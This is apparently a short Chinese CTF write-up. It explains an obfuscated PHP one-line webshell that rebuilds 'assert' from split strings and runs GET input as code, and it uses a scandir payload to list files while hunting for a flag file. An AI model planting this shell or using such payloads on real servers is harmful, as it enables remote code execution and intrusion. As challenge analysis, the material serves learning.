题目:
1 <?php 2 $poc="a#s#s#e#r#t"; #assert 3 $poc_1=explode("#",$poc); #数组 4 $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; #assert 5 $poc_2($_GET['s']) # assert($_GET['s']) 6 ?>
注:assert()函数内如果是字符串,函数将会把它当做PHP代码执行。
explode() 函数使用一个字符串分割另一个字符串,字符串分割后组成一个数组返回
读取到的信息:
如果 ‘ s ’ 为字符串命令,将会被assert()函数执行,通过此段一句话木马可通过assert() 函数可执行任意命令 ‘ s ’
通过 ‘ s ’ 输出文件目录:
构造 s => s = print_r( scandir( ' ./ ' ) )
注: scandir() 函数 返回一个数组,数组包含指定路径中的文件和目录
print_r()函数 以易于理解的格式打印变量
根据猜测测试:
进一步猜测 flag 在 f14g.txt 中:
